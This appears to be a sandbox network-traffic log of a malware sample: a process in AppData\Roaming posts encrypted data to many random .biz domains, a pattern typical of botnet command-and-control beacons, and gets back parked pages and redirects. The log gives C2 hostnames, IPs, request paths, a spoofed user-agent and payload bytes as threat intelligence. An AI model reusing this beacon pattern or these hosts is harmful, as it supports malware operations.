Jan 15, 2025 12:57:49.946656942 CET | 1236 | IN | Data Raw: 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 36 32 36 35 37 34 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2e 73 65 61 72 63 68 48 6f 6c 64 65 72 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 70 78 20 30 20 31 70 78 20 31 70 78 3b 0a 20 20 20 20 6d
Data Ascii: color:#626574 !important;}.searchHolder { padding:1px 0 1px 1px; margin:1rem auto; width: 95%; max-width: 500px;}@media screen and (min-width:600px) { .comp-is-parked, .comp-sponsored { color: #848484;
Jan 15, 2025 12:57:49.946691036 CET | 1236 | IN | Data Raw: 20 20 20 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 27 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 6d 61 57 78 73
Data Ascii: height: 24px; background-image: url('data:image/svg+xml;base64,PHN2ZyBmaWxsPScjRDdEN0Q3JyBzdHlsZT0iZmxvYXQ6IHJpZ2h0IiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgd2lkdGg9IjI0Ij48cGF0aCBkPSJNM
Jan 15, 2025 12:57:49.946722984 CET | 1236 | IN | Data Raw: 79 72 69 67 68 74 2e 20 20 41 6c 6c 20 52 69 67 68 74 73 20 52 65 73 65 72 76 65 64 2e 0a 3c 62 72 2f 3e 3c 62 72 2f 3e 0a 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 76 6f 69 64 28 30 29 3b 22 20 6f 6e 43 6c 69 63 6b 3d 22 77 69
Data Ascii: yright. All Rights Reserved.<br/><br/><a href="javascript:void(0);" onClick="window.open('/privacy.html', 'privacy-policy', 'width=890,height=330,left=200,top=200,menubar=no,status=yes,toolbar=no').focus()" class="privacy-policy"> Priva
Jan 15, 2025 12:57:49.946755886 CET | 612 | IN | Data Raw: 20 27 63 6f 6c 6f 72 53 65 61 72 63 68 42 75 74 74 6f 6e 27 3a 20 27 23 30 62 33 32 37 39 27 2c 0a 20 20 20 20 20 20 20 20 27 63 6f 6c 6f 72 53 65 61 72 63 68 42 75 74 74 6f 6e 54 65 78 74 27 3a 20 27 23 66 66 66 27 0a 20 20 20 20 7d 3b 0a 20 20
Data Ascii: 'colorSearchButton': '#0b3279', 'colorSearchButtonText': '#fff' }; </script><script type="text/javascript">let isAdult=false; let containerNames=[]; let uniqueTrackingID='MTczNjk0MjI2OS43OTcyOmM2ZjhkODRhMmMxYj
Jan 15, 2025 12:57:49.946789026 CET | 1236 | IN | Data Raw: 30 7a 51 6d 39 38 59 57 51 33 4d 32 45 35 4e 6a 64 69 4e 47 45 7a 4f 54 68 6c 4f 47 55 78 4e 32 59 30 4f 44 64 6b 4f 44 51 30 59 57 45 33 5a 54 55 35 59 54 4d 78 4e 44 46 6d 5a 58 77 77 66 44 42 38 66 44 42 38 66 48 77 77 66 44 42 38 56 7a 45 77
Data Ascii: 0zQm98YWQ3M2E5NjdiNGEzOThlOGUxN2Y0ODdkODQ0YWE3ZTU5YTMxNDFmZXwwfDB8fDB8fHwwfDB8VzEwPXx8MXxXMTA9fDdlOWE2MmY2NDFjODgwZWQ3OWRkNTE2OTI4NzkyZjRjMzcwMzg3MzZ8MHxkcC10ZWFtaW50ZXJuZXQxMl8zcGh8MHwwfDE3NzkyNzU0NTh8fHw='; let domain='przvgke.biz';
Jan 15, 2025 12:57:49.946826935 CET | 1236 | IN | Data Raw: 61 6e 74 2c 63 61 6c 6c 62 61 63 6b 4f 70 74 69 6f 6e 73 3a 20 63 61 6c 6c 62 61 63 6b 4f 70 74 69 6f 6e 73 2c 74 65 72 6d 73 3a 20 70 61 67 65 4f 70 74 69 6f 6e 73 2e 74 65 72 6d 73 7d 3b 69 66 20 28 21 61 64 73 4c 6f 61 64 65 64 20 7c 7c 20 28
Data Ascii: ant,callbackOptions: callbackOptions,terms: pageOptions.terms};if (!adsLoaded || (containerName in containerNames)) {ajaxQuery(scriptPath + "/track.php"+ "?toggle=adloaded"+ "&uid=" + encodeURIComponent(uniqueTrackingID)+ "&domain=" + encodeUR
Jan 15, 2025 12:57:49.951761007 CET | 1236 | IN | Data Raw: 20 27 2f 2f 27 20 2b 20 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 7d 7d 69 66 20 28 73 74 61 74 75 73 2e 65 72 72 6f 72 5f 63 6f 64 65 20 3d 3d 20 32 30 29 20 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 22 2f 2f 64
Data Ascii: '//' + location.host;}}if (status.error_code == 20) {window.location.replace("//dp.g.doubleclick.net/apps/domainpark/domainpark.cgi?client=" + encodeURIComponent((pageOptions.pubid.match(/^ca-/i) ? "" : "ca-") + pageOptions.pubid) + "&domain_


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        18192.168.2.224918218.141.10.10780
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:50.157849073 CET349OUTPOST /mspai HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: knjghuig.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 784
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:50.157864094 CET784OUTData Raw: f4 83 9d 2e 4d 2b d2 49 04 03 00 00 20 80 9d e5 c6 ac 02 95 d5 0a 68 9c b1 f8 ee 61 f8 d5 bc 1e 87 7b 21 fd 68 74 8c 68 15 63 88 62 2f c1 fa 52 e6 ea 75 90 2b 92 1b 9b 47 32 a6 6c d7 38 f1 95 45 d7 2b 5b 8c d0 95 e7 b8 65 d6 6d b2 54 2f 11 31 88
                                                                                                                                                                                                                                                                        Data Ascii: .M+I ha{!hthcb/Ru+G2l8E+[emT/1\Kl1y75$8!+:X*MT?%kr juOGpW$[&kY|y5k`>o:/~7|Xrj_]:sy^vf.Xg
Jan 15, 2025 12:57:51.549118996 CET | 412 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 15 Jan 2025 11:57:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=23e605ebba0bbcb99e40b336f860fd17|8.46.123.189|1736942271|1736942271|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.22 | 49183 | 82.112.184.197 | 80 | |
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:57:51.660360098 CET | 343 | OUT | POST /m HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 784
Jan 15, 2025 12:57:51.660388947 CET | 784 | OUT | Data Raw: 10 7c ee 2a ad ac 85 28 04 03 00 00 07 b0 4e ac 56 21 ba 99 3a 29 6b 31 0c 0b 8c 28 d0 94 5a 82 46 4d 4a c5 ad b5 7e a6 39 9f 97 b2 ce 83 06 fa 47 e6 ed c5 91 78 46 6e 1e 63 19 a1 cc c2 74 f8 8e 81 48 47 92 2c 6c 27 d2 b5 3f 0f d8 14 dc b7 9f 59


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.22 | 49184 | 82.112.184.197 | 80 | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:01.764179945 CET | 352 | OUT | POST /savrhhv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 850
Jan 15, 2025 12:58:01.764204979 CET | 850 | OUT | Data Raw: 46 6f 47 b2 cb e5 15 03 46 03 00 00 55 ef 0a 07 76 62 3c 84 33 1a 9f 76 ca d9 e9 21 c4 23 d5 45 00 6b 1b 3d 09 65 67 94 12 57 ec 1d 2b 2a fb 2c bd 7b 0d 2c a5 68 a0 4f db 60 83 b8 82 82 af a1 e7 ca f9 d4 c1 1e 39 0d 13 5e 36 13 ea 09 db 3a 52 15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.22 | 49185 | 82.112.184.197 | 80 | |
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:13.169465065 CET | 349 | OUT | POST /tehaooq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 784
Jan 15, 2025 12:58:13.169549942 CET | 784 | OUT | Data Raw: 16 0a 5c ca 82 c4 72 f7 04 03 00 00 f4 1e 63 00 3a b4 25 2d c6 3e f4 37 51 ca 64 84 39 79 4a 14 db fd fb 67 6c 4b a0 06 b7 cd 31 5e 0f fb b5 e4 79 c3 90 78 7f ae 68 e6 32 f9 60 60 6b 43 2e 5e cf 97 5b 8e 5e 44 a6 63 fd 47 d7 d5 09 f4 3d 0b bf 09


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.22 | 49186 | 54.244.188.177 | 80 | 1924 | C:\Users\user\AppData\Roaming\hVVSnrrP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:16.659689903 CET | 358 | OUT | POST /bqjjhsnkosjso HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 814
Jan 15, 2025 12:58:16.659710884 CET | 814 | OUT | Data Raw: 1c 87 cf cd 04 bf 9c 4a 22 03 00 00 9f 4d e7 ca 67 51 d0 74 41 62 77 22 e8 9c df d8 1b 74 5a 2f 84 04 3d a3 10 eb 17 cc 88 4b 95 ae 95 37 42 05 9f cf 0d 84 34 11 87 62 60 f5 5c 09 e8 3b 03 7e 9c c0 17 06 b5 9b be f1 05 7e 38 76 86 2c fe 26 43 5f
Jan 15, 2025 12:58:17.368026972 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 15 Jan 2025 11:58:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=056c56bc68013df01ed6139e3797886b|8.46.123.189|1736942297|1736942297|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.22 | 49187 | 18.141.10.107 | 80 | 1924 | C:\Users\user\AppData\Roaming\hVVSnrrP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:18.201039076 CET | 346 | OUT | POST /rgs HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 814
Jan 15, 2025 12:58:18.201057911 CET | 814 | OUT | Data Raw: 02 a1 9b 9e 74 41 1c 35 22 03 00 00 52 d3 77 25 41 46 68 38 12 db ea 91 46 fe 80 c9 e5 f8 b0 4c 72 a4 c4 68 c6 66 9c 6c fd fb a5 2b fc 85 e9 2d 18 ab 4d fe 77 83 f8 13 6a cd 22 8a f1 05 4d 8c a7 ef 6c ae b8 6b 5b 11 d1 93 05 28 1d 0a 13 f3 b1 0f
Jan 15, 2025 12:58:19.575298071 CET | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 15 Jan 2025 11:58:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=364ff58318c1370c81c9ff9386c1ade7|8.46.123.189|1736942299|1736942299|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.22 | 49188 | 54.244.188.177 | 80 | 1924 | C:\Users\user\AppData\Roaming\hVVSnrrP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:19.754714012 CET | 350 | OUT | POST /euichtddo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cvgrf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 814
Jan 15, 2025 12:58:19.754714012 CET | 814 | OUT | Data Raw: b8 f1 ac 7a 86 af 3d a5 22 03 00 00 c9 46 4f b4 97 05 97 ba 1a b2 3d 4e 89 dd 31 6d 45 97 e1 4a e5 d1 ff ae 6b 7a 30 ed 11 51 83 07 5c ec 91 3a 11 7c 8f a7 b7 c4 b8 60 a8 2f f5 0d e5 e0 00 4c 56 44 cb ea ab ea a4 03 e2 d6 d3 de 5e 60 02 d0 3d ab
Jan 15, 2025 12:58:20.475764990 CET | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 15 Jan 2025 11:58:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6106efb722e6dc0a15e2000723f122e8|8.46.123.189|1736942300|1736942300|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.22 | 49189 | 44.221.84.105 | 80 | 1924 | C:\Users\user\AppData\Roaming\hVVSnrrP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:20.578520060 CET | 346 | OUT | POST /ka HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: npukfztj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 814
Jan 15, 2025 12:58:20.578520060 CET | 814 | OUT | Data Raw: 41 59 89 43 24 86 c1 9c 22 03 00 00 17 29 cb 05 31 59 a8 29 f1 5e ef b1 06 c9 7f 65 5c c9 b1 a5 d8 4d df 53 df 0a 36 28 43 68 18 26 4a de ba e9 45 74 a8 6b 56 c4 fb 6c 16 36 53 ec 1f 82 b5 89 ad e7 a9 fa 8a 92 a5 05 18 26 e0 c3 71 fe 4e 53 6f e7
Jan 15, 2025 12:58:21.042254925 CET | 412 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 15 Jan 2025 11:58:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=477df4442fdf54403d5db538be38fb69|8.46.123.189|1736942300|1736942300|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.22 | 49190 | 72.52.178.23 | 80 | 1924 | C:\Users\user\AppData\Roaming\hVVSnrrP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:21.059031963 CET | 358 | OUT | POST /bhikwfegywkkepu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 814
Jan 15, 2025 12:58:21.059042931 CET | 814 | OUT | Data Raw: 6e 8d fc f7 22 7f 3c 3b 22 03 00 00 2e 4d 80 05 62 dc 4b 1b 50 e3 cc 15 c5 f4 97 92 1b fd b6 21 ed 4d e3 5d 53 ae b6 dc b7 9f 83 67 11 3e af 9a ea 50 ad e8 70 a4 ff c2 3f b0 0b 06 fb db 64 c6 1b 5f 2b e3 01 a0 3e c1 c4 0b 48 79 ed 63 41 b5 9f bf
Jan 15, 2025 12:58:21.595531940 CET | 289 | IN | HTTP/1.1 302 Moved Temporarily
Date: Wed, 15 Jan 2025 11:58:21 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Location: http://ww7.przvgke.biz/bhikwfegywkkepu?usid=20&utid=14164930459
Cache-Control: no-cache
Pragma: no-cache
Access-Control-Allow-Origin: *
Jan 15, 2025 12:58:21.811856985 CET | 289 | IN | HTTP/1.1 302 Moved Temporarily
Date: Wed, 15 Jan 2025 11:58:21 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Location: http://ww7.przvgke.biz/bhikwfegywkkepu?usid=20&utid=14164930459
Cache-Control: no-cache
Pragma: no-cache
Access-Control-Allow-Origin: *
Jan 15, 2025 12:58:22.469999075 CET | 355 | OUT | POST /ayokafkcxduc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 814
Jan 15, 2025 12:58:22.470000029 CET | 814 | OUT | Data Raw: 8b 9e 50 28 ca 93 9c 01 22 03 00 00 c2 a8 43 45 f1 9c c3 c1 b4 d1 94 b7 34 43 58 45 ca ed 09 9c e4 a4 34 3b e7 6d 41 5d de 88 76 8a 1c 97 6e 0d ce b0 f4 c1 c0 f1 54 d9 58 97 b5 90 21 64 8c 0a ee cb 63 48 35 e0 8a df 88 46 07 97 fe 7f 65 dd f8 d1
Jan 15, 2025 12:58:22.613903046 CET | 287 | IN | HTTP/1.1 302 Moved Temporarily
Date: Wed, 15 Jan 2025 11:58:22 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Location: http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640
Cache-Control: no-cache
Pragma: no-cache
Access-Control-Allow-Origin: *
Jan 15, 2025 12:58:22.827723980 CET | 287 | IN | HTTP/1.1 302 Moved Temporarily
Date: Wed, 15 Jan 2025 11:58:22 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Location: http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640
Cache-Control: no-cache
Pragma: no-cache
Access-Control-Allow-Origin: *


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.22 | 49191 | 199.59.243.228 | 80 | 1924 | C:\Users\user\AppData\Roaming\hVVSnrrP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:22.005378962 CET | 365 | OUT | GET /bhikwfegywkkepu?usid=20&utid=14164930459 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Host: ww7.przvgke.biz
Jan 15, 2025 12:58:22.468952894 CET | 1236 | IN | HTTP/1.1 200 OK
date: Wed, 15 Jan 2025 11:58:21 GMT
content-type: text/html; charset=utf-8
content-length: 1150
x-request-id: f9aa2e87-9c3f-4b4e-aa95-83747034f078
cache-control: no-store, max-age=0
                                                                                                                                                                                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_RZBYLw3HXC0CYGKlfqePfdks1jNtR6icVoQ1vaFhSz9FBBSTvIVyOjaOTblmA2ILD76OEoTqEmdkWtS+4oXHLQ==
                                                                                                                                                                                                                                                                        set-cookie: parking_session=f9aa2e87-9c3f-4b4e-aa95-83747034f078; expires=Wed, 15 Jan 2025 12:13:22 GMT; path=/
    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_RZBYLw3HXC0CYGKlfqePfdks1jNtR6icVoQ1vaFhSz9FBBSTvIVyOjaOTblmA2ILD76OEoTqEmdkWtS+4oXHLQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Jan 15, 2025 12:58:22.469012022 CET | 584 | IN | Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjlhYTJlODctOWMzZi00YjRlLWFhOTUtODM3NDcwMzRmMDc4IiwicGFnZV90aW1lIjoxNzM2OTQyMzAyLCJwYWdlX3VybCI6I


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.22 | 49192 | 13.248.148.254 | 80 | 1924 | C:\Users\user\AppData\Roaming\hVVSnrrP.exe

Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:22.665664911 CET | 363 | OUT | GET /ayokafkcxduc?usid=20&utid=14164930640 HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Host: ww12.przvgke.biz
Jan 15, 2025 12:58:23.301656008 CET | 825 | IN | HTTP/1.1 200 OK
    Accept-Ch: viewport-width
    Accept-Ch: dpr
    Accept-Ch: device-memory
    Accept-Ch: rtt
    Accept-Ch: downlink
    Accept-Ch: ect
    Accept-Ch: ua
    Accept-Ch: ua-full-version
    Accept-Ch: ua-platform
    Accept-Ch: ua-platform-version
    Accept-Ch: ua-arch
    Accept-Ch: ua-model
    Accept-Ch: ua-mobile
    Accept-Ch-Lifetime: 30
    Content-Type: text/html; charset=UTF-8
    Date: Wed, 15 Jan 2025 11:58:23 GMT
    Server: Caddy
    Server: nginx
    Vary: Accept-Encoding
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_QOhGfaVYWa4YenMbntZjEuHy6hvwxtA+AQ+ZYEAYSam4HNxcCceurgUQ590WuGxJzPqa4OA/wTX9v+Jm4Eofnw==
    X-Domain: przvgke.biz
    X-Pcrew-Blocked-Reason:
    X-Pcrew-Ip-Organization: CenturyLink
    X-Subdomain: ww12
    Transfer-Encoding: chunked
Jan 15, 2025 12:58:23.301963091 CET | 1236 | IN | Data Ascii: 3c05<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_QOhGfaVYWa4YenMbntZjEuHy6hvwxtA+AQ+ZYEAYSam4HNxcCceurgUQ590WuGxJzPqa4
Jan 15, 2025 12:58:23.302038908 CET | 1236 | IN | Data Ascii: gin:0 0 3px 20px;}.sitelinkHolder {margin:-15px 0 15px 35px;}#ajaxloaderHolder {display: block;width: 24px;height: 24px;background: #fff;padding: 8px 0 0 8px;margin:10px auto;-webkit-border-radius: 4px;-moz-border-radiu
Jan 15, 2025 12:58:23.302094936 CET | 1236 | IN | Data Ascii: ;}.footer { color:#626574; padding:2rem 1rem; font-size:.8rem; margin:0 auto; max-width:440px;}.footer a:link,.footer a:visited { color:#626574;}.sale_link_bold a,.sale_link,.sale_link a { color:#626574
Jan 15, 2025 12:58:23.302126884 CET | 672 | IN | Data Ascii: tom: 20px; background-color: rgb(17, 38, 77); text-decoration-line: none; font-size: 18px; font-weight: 700; color: #ffffff; text-align: left;}.fallback-arrow { float: right; width: 24px; height: 24px;
Jan 15, 2025 12:58:23.302160025 CET | 1236 | IN | Data Ascii: logic" type="text/javascript" src="https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.biz"></script></div><div class="wrapper1"> <div class="wrapper2"> <div class="wrapper3"> <br/> <script a
Jan 15, 2025 12:58:23.302191973 CET | 1236 | IN | Data Ascii: // Font-Sizes and Line-Heights 'fontSizeAttribution': 14, 'fontSizeTitle': 24, 'lineHeightTitle': 34, // Colors 'colorAttribution': '#aaa', 'colorTitleLink': '#0277bd', // Alp
Jan 15, 2025 12:58:23.302226067 CET | 1236 | IN | Data Ascii: 8fDF8fDB8MHx8fHwxfHx8fHwwfDB8fHx8fHx8fHx8MHwwfHwwfHx8MHwwfFcxMD18fDF8VzEwPXwxMDc2YjUwM2M4Y2I4OTVjMWE1ZTcwYjkxMzcyY2M3YjJmN2Y4OThjfDB8ZHAtdGVhbWludGVybmV0MDlfM3BofDB8MHwxNzc5Mjc1NDU4fHx8'; let domain='przvgke.biz'; let scriptPat
Jan 15, 2025 12:58:23.302258968 CET | 1236 | IN | Data Ascii: callbackOptions,terms: pageOptions.terms};if (!adsLoaded || (containerName in containerNames)) {ajaxQuery(scriptPath + "/track.php"+ "?toggle=adloaded"+ "&uid=" + encodeURIComponent(uniqueTrackingID)+ "&domain=" + encodeURIComponent(domain)+ "
Jan 15, 2025 12:58:23.302293062 CET | 328 | IN | Data Ascii: ;}}if (status.error_code == 20) {window.location.replace("//dp.g.doubleclick.net/apps/domainpark/domainpark.cgi?client=" + encodeURIComponent((pageOptions.pubid.match(/^ca-/i) ? "" : "ca-") + pageOptions.pubid) + "&domain_name=" + encodeURICom
